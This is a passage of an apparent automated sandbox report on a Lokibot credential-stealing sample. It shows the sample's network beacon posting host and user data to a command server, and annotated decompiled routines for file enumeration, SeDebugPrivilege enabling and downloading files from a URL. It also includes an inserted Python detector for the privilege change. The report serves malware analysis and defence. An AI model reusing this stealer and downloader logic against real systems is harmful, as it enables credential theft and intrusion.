                        date: Sat, 04 Dec 2021 22:40:28 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2e4366f0-5553-11ec-96cd-1bd532dae4ba; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:35 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        4 | 192.168.2.4 | 49768 | 212.32.237.90 | 80 | C:\Users\user\Desktop\rfxJzZjiWv.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Dec 4, 2021 23:40:29.848169088 CET | 1171 | OUT | POST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:29.874062061 CET | 1171 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones216041DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        Dec 4, 2021 23:40:29.886748075 CET | 1171 | IN | HTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:29 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2edefc6e-5553-11ec-a477-1bd561088fd5; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:36 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Code Manipulations


                        System Behavior

                        General

                        Start time: 23:40:22
                        Start date: 04/12/2021
                        Path: C:\Users\user\Desktop\rfxJzZjiWv.exe
                        Wow64 process (32bit): true
                        Commandline: "C:\Users\user\Desktop\rfxJzZjiWv.exe"
                        Imagebase: 0x400000
                        File size: 106496 bytes
                        MD5 hash: 8ED7E6B478CF0C00934BB42E3BDF5E20
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        Reputation: low

                        Disassembly

                        Code Analysis


                          Executed Functions

                          C-Code - Quality: 85%
                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                          				struct _WIN32_FIND_DATAW _v596;
                          				void* __ebx;
                          				void* _t35;
                          				int _t43;
                          				void* _t52;
                          				int _t56;
                          				intOrPtr _t60;
                          				void* _t66;
                          				void* _t73;
                          				void* _t74;
                          				WCHAR* _t98;
                          				void* _t99;
                          				void* _t100;
                          				void* _t101;
                          				WCHAR* _t102;
                          				void* _t103;
                          				void* _t104;
                          
                          				L004067C4(0xa); // executed
                          				_t72 = 0;
                          				_t100 = 0x2e;
                          				_t106 = _a16;
                          				if(_a16 == 0) {
                          					L15:
                          					_push(_a8);
                          					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                          					_t104 = _t103 + 0xc;
                          					if(_t98 == 0) {
                          						L30:
                          						__eflags = 0;
                          						return 0;
                          					}
                          					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                          					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                          					_t73 = _t35;
                          					if(_t73 == 0xffffffff) {
                          						L29:
                          						E00402BAB(_t98);
                          						goto L30;
                          					}
                          					L17:
                          					while(1) {
                          						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                          							if(_v596.dwFileAttributes != 0x10) {
                          								L21:
                          								_push( &(_v596.cFileName));
                          								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                          								_t104 = _t104 + 0xc;
                          								if(_t101 == 0) {
                          									goto L24;
                          								}
                          								if(_a12 == 0) {
                          									E00402BAB(_t98);
                          									E00403BEF(_t73);
                          									return _t101;
                          								}
                          								_a12(_t101);
                          								E00402BAB(_t101);
                          								goto L24;
                          							}
                          							_t124 = _a20;
                          							if(_a20 == 0) {
                          								goto L24;
                          							}
                          							goto L21;
                          						} else {
                          							L24:
                          							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                          							_t43 = FindNextFileW(_t73,  &_v596); // executed
                          							if(_t43 == 0) {
                          								E00403BEF(_t73); // executed
                          								goto L29;
                          							}
                          							_t100 = 0x2e;
                          							continue;
                          						}
                          					}
                          				}
                          				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                          				if(_t102 == 0) {
                          					L14:
                          					_t100 = 0x2e;
                          					goto L15;
                          				}
                          				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                          				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                          				_t74 = _t52;
                          				if(_t74 == 0xffffffff) {
                          					L13:
                          					E00402BAB(_t102);
                          					_t72 = 0;
                          					goto L14;
                          				} else {
                          					goto L3;
                          				}
                          				do {
                          					L3:
                          					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                          						goto L11;
                          					}
                          					if(_a24 == 0) {
                          						L7:
                          						if(E00405D24( &(_v596.cFileName)) >= 3) {
                          							L9:
                          							_push( &(_v596.cFileName));
                          							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                          							_t103 = _t103 + 0xc;
                          							_a16 = _t60;
                          							_t115 = _t60;
                          							if(_t60 == 0) {
                          								goto L11;
                          							}
                          							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                          							E00402BAB(_a16);
                          							_t103 = _t103 + 0x1c;
                          							if(_t99 != 0) {
                          								E00402BAB(_t102);
                          								E00403BEF(_t74);
                          								return _t99;
                          							}
                          							goto L11;
                          						}
                          						_t66 = 0x2e;
                          						_t114 = _v596.cFileName - _t66;
                          						if(_v596.cFileName == _t66) {
                          							goto L11;
                          						}
                          						goto L9;
                          					}
                          					_push(L"Windows");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					_push(L"Program Files");
                          					if(E00405EFF( &(_v596.cFileName)) != 0) {
                          						goto L11;
                          					}
                          					goto L7;
                          					L11:
                          					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                          					_t56 = FindNextFileW(_t74,  &_v596); // executed
                          				} while (_t56 != 0);
                          				E00403BEF(_t74); // executed
                          				goto L13;
                          			}


                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID: %s\%s$%s\*$Program Files$Windows
                          • API String ID: 1690352074-2009209621
                          • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                          • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                          				void* _v8;                       // token handle
                          				struct _LUID _v16;               // LUID of SeDebugPrivilege
                          				intOrPtr _v20;                   // _v32.Privileges[0].Attributes
                          				intOrPtr _v24;                   // _v32.Privileges[0].Luid.HighPart
                          				struct _TOKEN_PRIVILEGES _v32;
                          				intOrPtr* _t13;
                          				void* _t14;
                          				int _t16;
                          				int _t31;
                          				void* _t32;
                          
                          				_t31 = 0;
                          				E004060AC();                     // returns a process handle in eax (helper not in this excerpt)
                          				_t32 = __eax;
                          				// E004031E5 resolves an import from a hash. The call shape
                          				// (hProcess, 0x28 = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) is that of
                          				// OpenProcessToken, and the handle it returns is the one AdjustTokenPrivileges uses below.
                          				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          				_t14 =  *_t13(_t32, 0x28,  &_v8);
                          				if(_t14 != 0) {
                          					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                          					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                          					if(_t16 != 0) {
                          						_push(__ebx);
                          						// TOKEN_PRIVILEGES { PrivilegeCount = 1; Privileges[0] = { Luid, SE_PRIVILEGE_ENABLED (2) } }
                          						_v32.Privileges = _v16.LowPart;
                          						_v32.PrivilegeCount = 1;
                          						_v24 = _v16.HighPart;
                          						_v20 = 2;
                          						E004031E5(1, 9, 0xc1642df2, 0, 0);
                          						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                          						// The decompiler dropped the operands of this comparison; the result is 1 when the
                          						// AdjustTokenPrivileges call reported success. No GetLastError check follows, so a
                          						// token that does not hold the privilege (ERROR_NOT_ALL_ASSIGNED, still a non-zero
                          						// return) is reported as success.
                          						_t31 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_v8);              // called on the token handle; CloseHandle-style wrapper, not in this excerpt
                          					return _t31;
                          				}
                          				return _t14;
                          			}

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Similarity
                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                          • String ID: SeDebugPrivilege
                          • API String ID: 3615134276-2896544425
                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                          Uniqueness

                          Uniqueness Score: -1.00%
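One way to pick the behaviour of E0040650A out of endpoint telemetry, added here as an example for this report and not code from the sample or from Joe Sandbox: a small Python detector over Windows Security event 4703 ("A user right was adjusted") records. It assumes the events are exported as one JSON object per line with the EventData field names ProcessName, SubjectUserName and EnabledPrivilegeList, that the "Audit Token Right Adjusted" subcategory is enabled, and that the allow lists fit the environment. The log lines, paths and user names in it are constructed.

```python
"""Flag processes that enable SeDebugPrivilege, as E0040650A does.

Added example for this report, not code from the sample or from Joe Sandbox.
Assumption: Windows Security event 4703 is collected and exported as JSON
lines carrying the EventData fields ProcessName, SubjectUserName and
EnabledPrivilegeList.  Allow lists and log lines below are constructed.
"""
import fnmatch
import json

# Processes that legitimately enable SeDebugPrivilege on a workstation.
# Assumption: tune to the environment; an unknown process is the signal.
ALLOWED_PROCESS_GLOBS = (
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\*\*.exe",
    r"c:\program files (x86)\*\*.exe",
)

# Locations a standard user can write to. A privilege-enabling binary that
# runs from one of these looks like a dropped sample rather than installed software.
USER_WRITABLE_GLOBS = (
    r"c:\users\*",
    r"c:\programdata\*",
    r"c:\windows\temp\*",
)


def _matches_any(path, globs):
    path = path.lower()
    return any(fnmatch.fnmatchcase(path, g) for g in globs)


def classify_4703(event):
    """Return "high", "medium" or None for one parsed event record."""
    if event.get("EventID") != 4703:
        return None
    # EnabledPrivilegeList holds one privilege per line in the real event;
    # split on any whitespace so "\r\n\t" separators do not matter.
    enabled = set(event.get("EnabledPrivilegeList", "").split())
    if "SeDebugPrivilege" not in enabled:
        return None
    process = event.get("ProcessName", "")
    if _matches_any(process, ALLOWED_PROCESS_GLOBS):
        return None
    if _matches_any(process, USER_WRITABLE_GLOBS):
        return "high"
    return "medium"


def privilege_alerts(lines):
    """Run classify_4703 over JSON-lines input and return the alerts in order."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        severity = classify_4703(event)
        if severity:
            alerts.append({
                "severity": severity,
                "process": event.get("ProcessName"),
                "user": event.get("SubjectUserName"),
                "privileges": sorted(event.get("EnabledPrivilegeList", "").split()),
            })
    return alerts


# Constructed log lines for the example (not from the sandbox run).
SAMPLE_LOG = r"""
{"EventID": 4703, "ProcessName": "C:\\Windows\\System32\\lsass.exe", "SubjectUserName": "SYSTEM", "EnabledPrivilegeList": "SeDebugPrivilege"}
{"EventID": 4703, "ProcessName": "C:\\Users\\user\\AppData\\Roaming\\rfxJzZjiWv.exe", "SubjectUserName": "user", "EnabledPrivilegeList": "SeDebugPrivilege"}
{"EventID": 4703, "ProcessName": "C:\\Tools\\windbg.exe", "SubjectUserName": "analyst", "EnabledPrivilegeList": "SeDebugPrivilege\r\n\t\t\tSeSecurityPrivilege"}
{"EventID": 4703, "ProcessName": "C:\\Users\\user\\Desktop\\installer.exe", "SubjectUserName": "user", "EnabledPrivilegeList": "SeShutdownPrivilege"}
{"EventID": 4688, "ProcessName": "C:\\Users\\user\\Desktop\\rfxJzZjiWv.exe", "SubjectUserName": "user"}
""".splitlines()

if __name__ == "__main__":
    for alert in privilege_alerts(SAMPLE_LOG):
        print(alert)
```

Event 4703 is only written when the token actually holds the privilege and its state changes. In a standard-user context AdjustTokenPrivileges reports ERROR_NOT_ALL_ASSIGNED, which E0040650A does not check, and no 4703 is produced; this detector therefore covers the elevated case and needs process-creation telemetry beside it for the rest. The event is also noisy (svchost.exe and other system processes enable SeDebugPrivilege routinely), which is why the allow list does the real work.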

                          C-Code - Quality: 100%
                          			E00402B7C(long _a4) {                                   // allocate _a4 bytes from the process heap and zero them
                          				void* _t4;
                          				void* _t7;
                          
                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed   (flags 0, no HEAP_ZERO_MEMORY; the fill is done below)
                          				_t7 = _t4;
                          				if(_t7 != 0) {
                          					E00402B4E(_t7, 0, _a4);                         // memset-style fill with 0 (helper not in this excerpt)
                          				}
                          				return _t7;
                          			}

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                          • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                          • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E0040648B(void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                          				// _a4 is the URL; _a24 selects what is done with the file once it is on disk.
                          				void* __ebx;
                          				void* _t12;
                          				intOrPtr* _t13;
                          				void* _t14;
                          				void* _t20;
                          				void* _t23;
                          				intOrPtr _t25;
                          				void* _t28;
                          				void* _t30;
                          
                          				_t23 = 0x1a;                                            // default used when _a20 is 0; 0x1a is the value of CSIDL_APPDATA
                          				_t11 =  ==  ? _t23 : _a20;                              // decompiler dropped the operands: _a20 == 0 ? 0x1a : _a20
                          				_t12 = E00403C90(__edi, _a16, _a12, _a8,  ==  ? _t23 : _a20);   // builds the destination path (helper not in this excerpt)
                          				_t30 = _t12;
                          				if(_t30 == 0) {
                          					return _t12;
                          				}
                          				_t13 = E004031E5(0, 5, 0xdb5f7604, 0, 0); // executed   resolves URLDownloadToFileW (API list below, ref 004064CB)
                          				_t14 =  *_t13(0, _a4, _t30, 0, 0, __edi, _t20); // executed   URLDownloadToFileW(NULL, url, path, 0, NULL); trailing args are decompiler noise
                          				_t28 = _t14;
                          				if(_t28 == 0) {                                         // S_OK
                          					_t25 = _a24;
                          					if(_t25 != 0) {
                          						if(_t25 == 1) {
                          							_push(_t30);
                          							E004032E1();                                    // action 1: receives the downloaded path (handler not in this excerpt)
                          						}
                          					} else {
                          						E004041E6(0, _t25, _t30, _a28, 0, 1);           // action 0: receives the downloaded path and _a28 (handler not in this excerpt)
                          					}
                          				}
                          				E00402BAB(_t30);                                        // free the path buffer
                          				return 0 | _t28 == 0x00000000;                          // 1 when the download succeeded, whatever the handler did
                          			}

                          APIs
                          • URLDownloadToFileW.URLMON(00000000,00000004,00000000,00000000,00000000,00000005,DB5F7604,00000000,00000000,00000000,00000000,?,?,00000004,0000000A), ref: 004064CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Similarity
                          • API ID: DownloadFile
                          • String ID:
                          • API String ID: 1407266417-0
                          • Opcode ID: 071e399ec7af21538b868cc264b639d3431ba25e0254b9254fab110562a99bd8
                          • Instruction ID: 31f6f3cd4664c4fc69290711d1be470977221eb02724d5ca424450dbd89c53c8
                          • Opcode Fuzzy Hash: 071e399ec7af21538b868cc264b639d3431ba25e0254b9254fab110562a99bd8
                          • Instruction Fuzzy Hash: 1B01B1721001193FFB115EA59C86EFB2B5DDF457A8F01003AF904A51C1D97DDD6112A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406069(WCHAR* _a4, DWORD* _a8) {                     // thin GetUserNameW wrapper: resolve by hash, then call
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                          				_t4 = GetUserNameW(_a4, _a8); // executed
                          				return _t4;
                          			}

                          APIs
                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                          • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                          				int _v8;                  // token handle
                          				long _v12;                // size of the TOKEN_USER buffer
                          				int _v16;                 // TOKEN_USER*
                          				int _v20;                 // first 0x208-byte WCHAR buffer (passed in the Name position below)
                          				char _v24;                // character count for the second buffer
                          				char _v28;                // character count for the first buffer
                          				char _v32;                // SID_NAME_USE out-parameter
                          				intOrPtr* _t25;
                          				int _t27;
                          				int _t30;
                          				int _t31;
                          				int _t36;
                          				int _t37;
                          				intOrPtr* _t39;
                          				int _t40;
                          				long _t44;
                          				intOrPtr* _t45;
                          				int _t46;
                          				void* _t48;
                          				int _t49;
                          				void* _t67;
                          				void* _t68;
                          				void* _t74;
                          
                          				_t48 = __ebx;
                          				_t67 = 0;
                          				_v8 = 0;
                          				E00402BF2();              // returns a thread handle in eax (helper not in this excerpt)
                          				_t68 = __eax;
                          				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                          				// The "0x414449" annotations are the decompiler printing the runtime value it saw in the
                          				// &_v8 slot; its bytes 49 44 41 read as "IDA", which is presumably all the "IDA$IDA"
                          				// String ID in the metadata below refers to. It is not a string literal in this routine.
                          				_t2 =  &_v8; // 0x414449
                          				_push(1);                 // OpenAsSelf = TRUE
                          				_push(8);                 // TOKEN_QUERY
                          				_push(_t68);
                          				if( *_t25() != 0) {       // (hThread, TOKEN_QUERY, TRUE, &hToken): the call shape of OpenThreadToken
                          					L4:
                          					_t27 = E00402B7C(0x208);                  // 0x104 WCHARs, zero-filled
                          					_v20 = _t27;
                          					__eflags = _t27;
                          					if(_t27 != 0) {
                          						E0040338C(_t27, _t67, 0x104);         // _wmemset(buf, 0, 0x104)
                          						_t74 = _t74 + 0xc;
                          					}
                          					_push(_t48);
                          					_t49 = E00402B7C(0x208);                  // second 0x104-WCHAR buffer (passed in the ReferencedDomainName position below)
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E0040338C(_t49, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					// Both character counts are set to 0x208 although each buffer holds 0x104 WCHARs.
                          					_v28 = 0x208;
                          					_v24 = 0x208;
                          					_t7 =  &_v8; // 0x414449
                          					_v12 = _t67;
                          					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                          					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed   TokenUser size query: expected to fail and leave the size in _v12
                          					__eflags = _t30;
                          					if(_t30 == 0) {
                          						_t36 = E00402B7C(_v12);
                          						_v16 = _t36;
                          						__eflags = _t36;
                          						if(_t36 != 0) {
                          							_t14 =  &_v8; // 0x414449, executed
                          							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed   second TokenUser query into the buffer (wrapper not in this excerpt)
                          							__eflags = _t37;
                          							if(_t37 != 0) {
                          								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                          								// (NULL, TOKEN_USER.User.Sid, Name, &cchName, ReferencedDomainName, &cchDomain, &peUse):
                          								// the seven-argument shape of LookupAccountSidW
                          								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                          								__eflags = _t40;
                          								if(__eflags != 0) {
                          									_t67 = E00405B6F(__eflags, L"%s", _t49);   // result: a formatted copy of the buffer passed in the domain position
                          								}
                          							}
                          							E00402BAB(_v16);
                          						}
                          					}
                          					__eflags = _v8;
                          					if(_v8 != 0) {
                          						E00403C40(_v8); // executed          closes the token handle (same wrapper as in E0040650A)
                          					}
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E00402BAB(_t49);
                          					}
                          					_t31 = _v20;
                          					__eflags = _t31;
                          					if(_t31 != 0) {
                          						E00402BAB(_t31);
                          					}
                          					return _t67;
                          				}
                          				_t44 = GetLastError();
                          				if(_t44 == 0x3f0) {                           // ERROR_NO_TOKEN: the thread is not impersonating, so fall back to the process token
                          					E004060AC();                              // process handle in eax (helper not in this excerpt)
                          					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);   // same hash as the OpenProcessToken-shaped call in E0040650A
                          					_t3 =  &_v8; // 0x414449
                          					_t46 =  *_t45(_t44, 8, _t3);              // (hProcess, TOKEN_QUERY, &hToken); the decompiler shows _t44 where eax from E004060AC is passed
                          					__eflags = _t46;
                          					if(_t46 == 0) {
                          						goto L2;
                          					}
                          					goto L4;
                          				}
                          				L2:
                          				return 0;
                          			}

                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                          • _wmemset.LIBCMT ref: 00406244
                          • _wmemset.LIBCMT ref: 00406261
                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Similarity
                          • API ID: _wmemset$ErrorInformationLastToken
                          • String ID: IDA$IDA
                          • API String ID: 487585393-2020647798
                          • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                          • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {                 // _a4 = host name, _a8 = service/port string, both handed to getaddrinfo
                          				signed int _v8;                                         // struct addrinfo* result
                          				intOrPtr _v28;                                          // hints.ai_protocol
                          				intOrPtr _v32;                                          // hints.ai_socktype
                          				intOrPtr _v36;                                          // hints.ai_family
                          				void _v40;                                              // hints (struct addrinfo: 8 dwords on 32-bit Windows)
                          				void* _t23;
                          				signed int _t24;
                          				signed int* _t25;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t33;
                          				signed int _t41;
                          				void* _t42;
                          				signed int* _t43;
                          
                          				_v8 = _v8 & 0x00000000;
                          				_t33 = 8;
                          				memset( &_v40, 0, _t33 << 2);                           // zero the 32-byte hints
                          				_v32 = 1;                                               // SOCK_STREAM
                          				_t23 =  &_v40;
                          				_v28 = 6;                                               // IPPROTO_TCP
                          				_v36 = 2;                                               // AF_INET
                          				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                          				if(_t23 == 0) {                                         // the decompiler shows _t23, but the test is on eax: getaddrinfo returned 0
                          					_t24 = E00402B7C(4);                                // zeroed 4-byte holder for the SOCKET
                          					_t43 = _t24;
                          					_t31 = _t30 | 0xffffffff;                           // INVALID_SOCKET
                          					 *_t43 = _t31;
                          					_t41 = _v8;                                         // only the first addrinfo result is used; ai_next is never followed
                          					// ws2_32 ordinal 23 = socket(ai_family, ai_socktype, ai_protocol); trailing args are decompiler noise
